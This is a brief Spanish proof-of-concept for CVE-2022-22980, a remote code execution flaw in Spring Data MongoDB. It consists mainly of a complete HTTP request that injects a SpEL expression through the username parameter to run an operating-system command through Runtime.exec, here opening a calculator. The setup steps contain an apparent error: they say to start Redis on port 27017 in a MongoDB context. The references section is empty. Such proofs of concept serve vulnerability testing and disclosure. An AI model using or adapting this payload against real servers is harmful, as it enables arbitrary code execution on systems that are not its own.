
Exploit de prueba de concepto para CVE-2022-22980, una vulnerabilidad de ejecución remota de código en Spring Data MongoDB mediante inyección SpEL en el parámetro de nombre de usuario.
Vulnerabilidad trivial, solo para registro.
Iniciar Redis en el puerto 27017
Iniciar el proyecto, Spring Boot en el puerto 6666


GET /v1/user/get?username=T(java.lang.Runtime).getRuntime().exec('open+-a+calculator.app') HTTP/1.1
Host: localhost:6666
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 2
Referencias: